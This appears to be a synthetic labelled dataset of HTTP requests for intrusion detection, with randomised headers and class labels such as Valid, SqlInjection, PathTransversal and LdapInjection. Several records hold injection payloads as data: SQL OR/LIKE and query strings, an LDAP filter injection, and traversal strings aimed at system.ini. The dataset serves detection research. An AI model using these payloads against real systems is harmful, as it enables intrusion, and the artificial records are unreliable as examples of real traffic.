Accept-Language: rCowe-mesahilS, ptws-eeqmi;q=0.2, oeM-czri0;q=0.7, Edaeed-VetN, aUtns-c
Cache-Control: min-fresh=7877
Client-ip: 0.71.216.233
Cookie: tSIwagosqA=15258429;ggd8267saar=isamr3;hriAoueasrs=88;ok2MMselect4=52339;NaEmzejnsaxhg=mo9
Cookie2: $Version="57"
Date: Thu, 23 Sep 04 06:23:24 UTC
ETag: "JarnysbGWnFuyo3XaiLD"
Expect: bnur
From: suioa@wtliyr.cz
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Thu, 12 Aug 04 02:14:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: 0yw5ox eiep5=laseOb
Range: 538473-,02-79806
Referer: /hmoa6.tiff
TE: trailers,gzip;q=0.7,trailers
Trailer: Referer
User-Agent: Mozilla/8.9 (compatible; Konqueror/4.3; Win 9x; Etm2iou)
UA-CPU: StrongARM
UA-Disp: 028,1328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: FTP/8.7 26.234.110.73, 9.1 84.229.110.230:3476
Transfer-Encoding: identity
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21518
Start - Id: 41546
class: SqlInjection
POST /msMuhY1V8U/4twaap9.htm? HTTP/1.1
Content-Length: 118
Content-Language: Eos
Content-Encoding: identity
Content-Location: /HqEix/eeOnsi/eqeE/qrresu/iehgielh.swf
Content-MD5: aXNuaWM3eTVxb2lzYWR2ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 22:31:18 UTC
Last-Modified: Thu, 22 Apr 04 11:06:31 UTC
Host: 134.64.120.244
Connection: coda2
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iNyf9sar-hbejera, tvAznalu-cAst, eeild3s-m, e6-ite6, kfx-psy3bai
Cache-Control: no-store
Client-ip: 141.137.190.71
Cookie: rLennialE=rJc4iROAL
Cookie2: $Version="56"
Date: Tue, 03 Nov 09 20:52:55 CET
ETag: W/"I-1BCZuVOcSp3nVg"
Expect: 100-continue
From: gJohs0a@amewNlgh.cz
If-Modified-Since: Sun, 26 Apr 09 23:35:43 GMT
If-Unmodified-Since: Wed, 26 Sep 07 12:08:25 CET
If-Match: *
If-None-Match: *
If-Range: "giZJW4Eu4abUvb7@No"
Max-Forwards: 44
MIME-Version: 6.1
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 277481-,6038-
Referer: /inMn/enprau.rar
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/8.5 (Windows; U; Win98 2.0; rn-bH; rv:5.5.5) Gecko/03642841
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8585x974
Via: ybhee/8.0 www.o1tetPcW.shtml, 0.2 www.ahAtxwu.css, iH0dei/4.3 137.42.183.38
Transfer-Encoding: gzip
Upgrade: iaDf6/1.7, ftqty/7.0, ewiv/6.4, asctho/8.1
Warning: 751 www.Lnbf.js "segwzwse" 
X-Forwarded-For: 84.75.227.228
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

enb=0bTts+rdL6tae&gltde='   OR     'mDlb7mw'  LIKE    'aze%25&eepsun=caE;rzIdnl&tvha0umn4en7rle=h$@a

End - Id: 41546
Start - Id: 34205
class: Valid
POST /IO-ddivB@/gbo_rhPA4bt9.K/bazlsgEd4fa2U8rh6/CU.mEhO.s3SnodeL/81AljCl1@/iMWU6Z7uKpZ88wGd/iwS/riyaolea0tu4aaeeqm.htm? HTTP/1.1
Content-Length: 44
Content-Language: fs,g,mXoulrta
Content-Encoding: gzip
Content-Location: /nHi7o/ryezu/oantahr/qde3.aspx
Content-MD5: TmlzMHNldG92ZWFlMWNpUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Apr 08 23:23:53 GMT
Last-Modified: Fri, 22 Jan 10 11:17:22 CET
Host: 139.139.203.200:59353
Connection: close
Accept: audio/*, text/xml
Accept-Charset: x-mac-chinesetrad, ks_c_5601-1987;q=0.0, euc-kr;q=0.8, cp-932;q=0.3
Accept-Encoding: gzip;q=0.9, gzip;q=0.5, gzip, compress;q=0.8
Accept-Language: o-mnoj, tugra-tPja6qn, htooa-Rsiiahs, g2n-nugrs3t
Cache-Control: max-age=177
Client-ip: 250.232.199.246
Cookie: MaSivvz=52;oTntde0ire4Ae=oug;swe=32840;fje=5;F7K@7=n;y5BzT89hti=wptre
Cookie2: $Version="29"
Date: Wed, 24 May 06 18:08:08 CET
ETag: "K2_PZU7cF5N0NXJO"
Expect: sIjiImjt=ldqwh;beRatEd=e3rxTeTi
From: tmwyT@acvot.it
If-Modified-Since: Fri, 28 Jul 06 19:52:40 CET
If-Unmodified-Since: Sun, 14 Jun 09 13:39:45 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Mar 06 07:33:39 GMT
Max-Forwards: 79
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mhdk mTsemHH2=tiTaS
Authorization: Digest uri=http://www.eehr2i.de/T6id/lbese/6olru.mdb
Range: -23,2252-463,93059-
Referer: /eblropig/OeTau.sh
TE: deflate;q=0.0,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (X11; U; SunOS sun4u 0.0; na-ai; rv:5.0.4) Gecko/06424846
UA-CPU: x86
UA-Disp: 5943,076,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: 1.2 www.ttgd.jpeg, rpHzSe/3.9 148.129.64.223
Transfer-Encoding: e1xpO; otIO=qch5ntcm
Upgrade: l4mic/8.6
Warning: 422 150.71.176.60:83957 "bprw97nHpMnucAo" 
X-Forwarded-For: 161.13.197.27
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eehrs1dmeedamN=nry$e@&T4orglo=5269150504

End - Id: 34205
Start - Id: 22894
class: Valid
GET /86BRM2z6Ul3uFS/elm@p93oSlB9/BFBN8_lf/sx/ayVIIVtRgEcj/4ehf87YO8E3Eh9/oW1uN_2bV0.jpeg? HTTP/1.1
Host: www.eaooS.net
Connection: 8loks
Accept: */*;q=0.6
Accept-Charset: big5, us-ascii, macintosh
Accept-Encoding: 
Accept-Language: mtpc-n, ogtui-6eHe3uht
Cache-Control: nElet7o9='zON'
Client-ip: 250.14.63.166
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="719"
Date: Fri, 14 Jan 05 03:53:28 UTC
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: 100-continue
From: aseiiog@zr5aou.org
If-Modified-Since: Thu, 06 Aug 09 19:59:52 UTC
If-Unmodified-Since: Fri, 15 Apr 05 16:06:16 CET
If-Match: "2PVL--e90fvq8rK"
If-None-Match: *
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 54
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Digest realm
Range: -6039,4724-
Referer: http://elshe.de/aplefxh/seetnk/otre/olvtd.js
TE: deflate,gzip
Trailer: Trailer
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 2.7; yr-R0; rv:8.4.8) Gecko/44317186
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 5.0 38.95.217.2, HTTP/1.1 www.l2ethouh.js:634
Transfer-Encoding: deflate
Upgrade: enatdd/2.0, rmbvnI/8.6
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22894
Start - Id: 623
class: Valid
GET /1pvZy/Rooe5Euiaoawr.js?8T=orisbT98&taN=icnnhit&OaAcsiEE2anbx=gsnhdtlo3ag&eubq=1207&3xrOdvc=swdcasvino&hO18=st%3D+rrrobMfromT0r%27O&nsec=li3isdswDd8s&Hk@n9UV2TGnullE=576&tijnbjee=11814283&nhtThy=tlibn&n4thelquxMlahl=dld%3EuxiOit&yanagwylfr2=utcOw%5C-tkepasswdaccess_log+%7C0r%26Nnlog&udsxhctehdvm=ldrSoc%5Cbin4 HTTP/1.1
Host: www.1dum.ch
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: compress, gzip, compress, gzip;q=0.8
Accept-Language: *;q=0.4
Cache-Control: min-fresh=6
Client-ip: 178.198.248.128
Cookie: 5shpSEBIE=4cHd5zsnen~q;6eeoodfedAi=qicr;7xwd9nj=5314;te=484;vs=hi kmailt;aosQis=43
Cookie2: $Version="909"
Date: Thu, 26 Jun 08 05:00:59 CET
ETag: "E7j4JQTrwHa3gQ.o"
Expect: owRwMo
From: ystebe@hnBteRt6v.be
If-Modified-Since: Mon, 13 Sep 04 18:31:59 GMT
If-Unmodified-Since: Tue, 16 Mar 10 08:57:40 GMT
If-Match: *
If-None-Match: "EerfZs7NUZrqnMpaa1"
If-Range: Sat, 27 Sep 08 24:52:15 CET
Max-Forwards: 7123
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: NTLM ZGVpbmZhcnFwbm5iamV1aWVyZGh0c3VoZWRtc2R0cmlvYWVkaUs=
Range: 0-,76-659886
Referer: http://us5epsfa.fr/OSosef/dttijy/aidhe.jpeg
TE: deflate,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/4.8 (Windows; U; Win98 6.4; hh-rt; rv:9.2.3) Gecko/66431871
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x961
Via: oomc/0.8 www.axaf7ys1.jpeg, HTTP/0.6 152.21.90.228
Transfer-Encoding: tesEtr; aPitrm=yeyayjp
Upgrade: dog/2.3, ranys/6.1, ariu/3.6, aatroo/3.3, eb8/2.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 623
Start - Id: 16291
class: Valid
GET /osktslotl/QedcbteuNeshOuxeriE/eGs6Acnd/rtrrb0e4dGnbnu/a4VTQqjVvr8a/3bot7d1fhtpass5/lFD.l.HOKy-/oT1-GK3EOKdsu2z/et9adIam/xKA1/uessate0odt.jpeg?y374PKgJdeleteMfP=hrifawinntcb%22ct%3A%22e&bc9sdga=l4rgk6hetln&sdEoetggwe=toR&ZE0Pvc=yoALzl&u6demtwSttpt=9625734&L@MW=3573391&NdtQG7=7543&ootAmE=+cf2u%26hnZ%7Edn54s&o7fl=Lc%24varshrre HTTP/1.1
Host: 128.0.224.187
Connection: keep-alive
Accept: image/png, audio/basic;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 134.144.136.159
Cookie: APIWTbnTimg0NY=seneeseze;eih1h=tt2;elcbatoeae2mtj=8507;4qzeyhnr=hiyTndttsirtyTi;ear=op2@km0U8S;ZArMbodyFVQ=5 ayf>t6c9r
Cookie2: $Version="4"
Date: Tue, 23 Dec 08 21:58:22 UTC
ETag: W/"kQ6IL2CBN@n@CBVQiDRz"
Expect: 100-continue
From: mvsEd9fe@oerbListyi.uk
If-Modified-Since: Thu, 11 Mar 04 05:36:49 GMT
If-Unmodified-Since: Tue, 23 May 06 01:57:45 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Jun 04 12:56:29 GMT
Max-Forwards: 5103
MIME-Version: 2.0
Pragma: moqea='rnnilr8'
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: m3tska xmcxng=62Yt
Range: -4823,134863-6,-1714
Referer: /aaMcHa9.gz
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.0 (Machintosh; U; Mac OS X 0.8; Nc-eT; rv:7.3.5) Gecko/04528523
UA-CPU: 68000
UA-Disp: 967,6730,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2196x3302
Via: 1.1 26.193.27.215, FTP/8.3 91.247.212.131, 1.3 www.eyih.jpeg:2
Transfer-Encoding: gzip
Upgrade: yejeyl/5.7, ooo/5.3
Warning: 052 186.95.53.70 "owyml9d5dtss6hanh" "Sun, 04 Sep 05 20:42:11 CET"
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16291
Start - Id: 42094
class: SqlInjection
GET /mR.asp?eloencn3Ee=%27select+customer_phone++++%27%7C%7C%27from++customers++++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27+++and++customer_type%3D1%27%3B HTTP/1.0
Host: 228.192.106.192:096
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.9
Cache-Control: min-fresh=46
Client-ip: 198.157.61.69
Cookie: GNZYv=niijtxhhttpieo2lruds8u;lgYxFGnph-DyIbM=aCcaCLWSw;srjO=965260
Cookie2: $Version="6"
Date: Tue, 22 Apr 08 07:08:59 GMT
ETag: "LDDavkvevsD5sRGxSR"
Expect: bu7dtjr
From: LzmxnseS@evezd.fr
If-Modified-Since: Mon, 05 Jun 06 19:11:22 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 5612
MIME-Version: 0.9
Pragma: hnqnezor=1Pee
Proxy-Authorization: NTLM ZWRsQmkwaXFyaW4yZXpoaGVSNTdyb2llRXRpYXRlbmk4cmRhaWM=
Authorization: Digest qop=auth-int
Range: 106-1944,67279-,2-
Referer: /tepfts/soTis/aOvehsc.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 3.0; ye-sd; rv:7.4.1) Gecko/00628701
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: compress
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42094
Start - Id: 45482
class: PathTransversal
GET /po/tldqf.js?hg=nSrtihun3Em3sNrTiN&tbOreedso=0&Nlecnefshsy=t&etsl1mqhnt=%3Bhh%3A-trsere%40&lP=91&zMtE=6428&tn1tarkr=1&eghol=57568243&7P5nph-nftMFL=285&dwo24=341&Timaqemi5=jn%3Fit%3C%3E&Ic6an0miehlte=%5CWINNT%5Csystem.ini&s5=%40&L.Elc7img=MlomzweS16%5Ct&kcSrnra3tuo=99869392 HTTP/1.1
Host: www.esheiun9ya.cz
Connection: close
Accept: audio/x-wav
Accept-Charset: windows-1254
Accept-Encoding: compress, gzip, identity;q=0.0, identity;q=0.0
Accept-Language: *;q=0.8
Cache-Control: min-fresh=1
Client-ip: 53.223.189.118
Cookie: QXMu6W7VzS-=2917286770
Cookie2: $Version="012"
Date: Sat, 04 Oct 08 14:12:18 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: 100-continue
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 30 May 09 22:19:40 CET
If-Unmodified-Since: Thu, 24 Jun 04 05:19:25 UTC
If-Match: "4lGHrAzX1DOkcv1tr"
If-None-Match: "EExfkUNEnGM@GzY@r"
If-Range: "KZt_3YzgCYNe3WW1QD"
Max-Forwards: 5
MIME-Version: 0.5
Pragma: seieea=0cs
Proxy-Authorization: Digest username="hesa"
Authorization: Basic aGlqNmNzOmhkc3hvaHdl
Range: 7-
Referer: http://i6vti.org/pyzhBon.php3
TE: trailers
Trailer: Pragma
User-Agent: gobmveaOft (vNlD6_98pC; 3-2nw1; rDiqLbs-jf)
UA-CPU: PowerPC
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: 0.4 8.184.177.255, secha/7.7 www.eaahi5.htm, 8.7 156.118.248.114
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45482
Start - Id: 6126
class: Valid
PUT /nGnfzrmunxouhtn7/tRTZy/7bGpGcmdbUvmpWxml.jpeg? HTTP/1.0
Content-Length: 301
Content-Language: hLscCuxz
Content-Encoding: gzip
Content-Location: http://www.Dhma.com/trYn/zuwceni/jeYezpen/h0tEliW0/elrceleo.html
Content-MD5: dE1uSWVidmdlY2xuc21lbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 25 Mar 10 09:41:06 GMT
Last-Modified: Wed, 25 Feb 04 02:14:52 CET
Host: www.makk.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0
Client-ip: 2.7.31.61
Cookie: rieart=nertidGoote;dSddOnhtto=kYgSBEqy8do;LkservicesA40ak=s37z3rnlinko@amo;infhX9irltlorej=kK.x4k@5;a1du4h=ehweeehnuhTE;J_2F6RV=:esTojw+rostdinip5h
Cookie2: $Version="14"
Date: Wed, 08 Mar 06 13:37:13 GMT
ETag: W/"LgvUzZfMgjoNvwGvu22I"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Mon, 04 Oct 04 09:27:37 GMT
If-Unmodified-Since: Thu, 19 May 05 21:35:46 GMT
If-Match: "GE02bdpeqITD7nUKl"
If-None-Match: *
If-Range: "Y0r0BG8EYguSIm5Gh"
Max-Forwards: 072
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM b2xpdGR2dWVpb29laXJ1dXNldG5hbFNlbHlzMHRvYThmaWhzYWV1ZWNFZWU=
Authorization: NTLM aWx3cGVzdHpzZWRpQWF0bm81ZWRoZWhlcm1hNWFpbmRhMGNvdG5hcmllZW8=
Range: -53632
Referer: http://www.tinrcooi.uk/oodqtte/0tiadoo/THhgNiH/wXcers.pdf
TE: deflate;q=0.3,trailers
Trailer: Via
User-Agent: rilddWdO
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: gzip
Upgrade: st1/5.7, nstxP/1.9
Warning: 924 www.hrht.png:4 "ieats" "Mon, 14 Dec 09 01:46:05 GMT"
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

rokscoenheini=ttcuuoih&eieenqtxidom=ohmlreareiic9unrAh&rxeazfl=/>Oith&licewrty=aRs3o&mitetbt=dconnectscriptc1ednbeg1f&y9ahraaaO1u1=mu8sdsqnshlnslo&R1kniaE=+ecooedc&tr0pne=oc('2Gs7?%u1h Tsystemul&U72jz=lQIgoZF0d&eleAainjq9atp=ncatiywn7i2as8ru&Inari=ab5sC9FGw&laaaqri=8345629226&Hzt2C=3598

End - Id: 6126
Start - Id: 4271
class: Valid
PUT /yl0Eo/sxtB6body67TOinsertGSi1/eedQnmemtjosaio/iecnBaeorin2mre/iw1sse.jsp? HTTP/1.1
Content-Length: 146
Content-Language: eee6hicw,zuoats,satateb
Content-Encoding: identity
Content-Location: http://www.Zr7r5631.st/9Zpaerth/caww/qerun.avi
Content-MD5: YmlzV29zaTRuZXR1c29lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 21:46:11 CET
Last-Modified: Wed, 28 Jan 04 16:26:11 CET
Host: 46.3.22.202:02
Connection: close
Accept: video/*, image/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=2327
Client-ip: 247.55.250.216
Cookie: eqo2GOGm7=uoTnoAhuEamvatst9i;fHceh=48911
Cookie2: $Version="11"
Date: Tue, 15 Dec 09 09:07:19 GMT
ETag: "sI4Zj5ZrXbshbjjV7e"
Expect: 100-continue
From: exh6@9eehdnqs.de
If-Modified-Since: Thu, 11 May 06 04:55:06 UTC
If-Unmodified-Since: Sun, 26 Sep 04 02:14:30 GMT
If-Match: "cX7UgjauUYnJ5qC0l6"
If-None-Match: "gEs6K1um5yGKUfbu"
If-Range: "2L3FBvPbOZRFRkhFnGd"
Max-Forwards: 86
MIME-Version: 0.2
Pragma: hrautCtn='ahbb'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM ZTRhYXRlc2tvdW40cHVhNXRCZmhtenRldGFhaWFnd2xudGFtYXV5Mnlob255aXM=
Range: 557-
Referer: /wlWseny7/trot/tyneu.avi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 5.4; is-te; rv:0.6.1) Gecko/74951340
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5153x5817
Via: FTP/1.2 www.iaux5E.jpg, 4.4 www.tlEhtwa.tiff
Transfer-Encoding: aqon
Upgrade: Unh/4.4
Warning: 529 www.eedpOe9e.css "dilAc6" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 62285156998436291420
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

voBcatV1unionEwindow.openF=a&iwh6oTte6tS=srt&aS3=sspO+trm&sl8inuhde=z e3j&fli=1591463868&rBKzdivYX=06531&nndaivrnegs=lwlax&EEi7eseyey7u=tloq%9

End - Id: 4271
Start - Id: 32457
class: Valid
GET /EkOscer1trLisisgj/iAnetcatmncWqOun81v/bgsound449/e9i82bee/lRcx6.pJGA@0CQK@rNl/7rio5zrdct/h4es2ni1edeho3i/jcVw8HC/cmd9O4KexZL/s7RzJuK/e5asoIioaeqie.jsp? HTTP/1.0
Host: 151.224.30.172
Connection: Eazw3e8
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, identity, deflate
Accept-Language: ar-f, cgpe0sIt-rnybds, lC-ee
Cache-Control: min-fresh=2
Client-ip: 145.133.185.131
Cookie: s3=ysrzi;havingobject7X=iImKEjX;hereenMkw=6648965
Cookie2: $Version="33"
Date: Thu, 27 Aug 09 08:38:20 CET
ETag: "L@hxhH-RK5Ql4dG7"
Expect: Rlray
From: euedYotd@rhStwtetaa.biz
If-Modified-Since: Fri, 17 Apr 09 01:57:48 GMT
If-Unmodified-Since: Tue, 20 Sep 05 14:03:35 GMT
If-Match: "vCAW3Q744zBTuUC3"
If-None-Match: "Iw-NIcVKK34sDpJ"
If-Range: *
Max-Forwards: 4060
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic bGVpRjpwZWFoZThvcw==
Authorization: Basic dGl0ODV0OnRxSTRhZnQ=
Range: 0-28647,3436-,-8
Referer: http://eokta.org/anenttn/eAeljm.gif
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: uoD5CQFW http://www.Orbi7t.it
UA-CPU: MIPS
UA-Disp: 724,9778,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2914x4249
Via: HTTP/0.8 www.ilaayet.html, FTP/1.9 www.cnxsrlt.html
Transfer-Encoding: gzip
Upgrade: 5tw/6.4, tm6sen/6.9, a0ksr/0.4, u6a/4.3
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 312959390878610
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32457
Start - Id: 38461
class: LdapInjection
GET /itepf6hrd/6BNjE/lNa.YUaKK-K6IG8d4Sc/hntvwptEhed/Ietatahuiltdic6igee/betweenPFO5ca/if25Aq_hceywpSPGXMt9.cgi?sduhem=anh9s%27aivltusrCnc&grfw7ex=uMcwIhAY6oO&d9tg=snrwhhOE0lEheh9&shMedscra1=%29+%28%7C+%28+++cn%3D*o+++%27brien*+++%29%28mail%3D*o%27brien*+%29+++ HTTP/1.1
Host: 89.33.209.11
Connection: egeIaa4e
Accept: text/plain, audio/*;q=0.5, image/*
Accept-Charset: euc-cn;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=3223
Client-ip: 131.162.142.41
Cookie: tqet=orelike
Cookie2: $Version="35"
Date: Sat, 09 Dec 06 22:34:03 UTC
ETag: "w7gxV.ZSTnC6uJzCuciw"
Expect: betmtr=nyjiso;hCgrf6g
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sat, 23 Dec 06 24:50:10 GMT
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: "jOuYQtaOS4IwqAs"
If-None-Match: *
If-Range: Fri, 05 Jun 09 09:18:42 UTC
Max-Forwards: 006
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: 24-,76759-,-19589
Referer: http://ataien.net/titHnp/tenhcn/24gEd/ittdrsNt/ohs9icm.png
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.7 (X11; U; Linux i586 3.2; yw-ah; rv:6.9.1) Gecko/79736476
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: deflate
Upgrade: he9qat/8.2, oIocas/7.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38461
Start - Id: 36108
class: PathTransversal
GET /atZg_vVp/gM.HZ/mkGW8KJHx./mR7ZlCQjq1aK@7Ja/stee/2@t/ndz/faarothO4/xZmvCG7DjBxIe/4kRhM.Ne/hefysealiiltqlTvti.jpg?oaheH9nuisgsBw=2487792&ddRsipeakcsiLs=..........................WINNTsystem.ini&_lsxp_fd2khttppsUy=l%26metccn&sdotheepr=79798229&xOovm=dats&aKYb9i0rSel8p=einnlmhtttueHbr&nxphfdrrnmi=s+anduy+trsg%26a1%3C&ie=+ssmenmt&tb_a8eRscriptOGH=3tk_HeTt0T&oih5l0aeeat=eodchr4t HTTP/1.0
Host: 146.200.251.217
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.3, big5, x-mac-ce;q=0.0, ks_c_5601-1987;q=0.0, iso-8859-3;q=0.8
Accept-Encoding: 
Accept-Language: TibhtMjh-th;q=0.1, tWnertFo-eb, HsZteI-R;q=0.0, baoindwi-neuhgamp, honCEtse-etb5eeh9;q=0.6
Cache-Control: no-transform
Client-ip: 100.85.62.104
Cookie: iodr4=aD363rFsXiq;7DPB5=193167453;7a5EohtdH=baatHetilikr<
Cookie2: $Version="794"
Date: Thu, 18 Feb 10 21:30:04 CET
ETag: "jqHrHBgDmTe38p.2cK"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Tue, 19 Jan 10 22:55:23 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: *
If-None-Match: "pNnSrZ5ox0mZd5ut@"
If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5209
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dRsla 9anaot=sres0r
Range: -9,08359-983,16084-76
Referer: /ncqs/iheyems/eBn1lrOs/eRib.swf
TE: gzip;q=0.6,gzip;q=0.8,deflate
Trailer: Referer
User-Agent: Mozilla/1.2 (X11; U; Linux i586 6.9; nY-tl; rv:3.8.8) Gecko/41815438
UA-CPU: Sparc
UA-Disp: 0150,960,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8256x1298
Via: HTTP/7.9 www.ueAaopO.jpeg, 5.3 132.61.225.90:72, 4.8 179.232.56.164
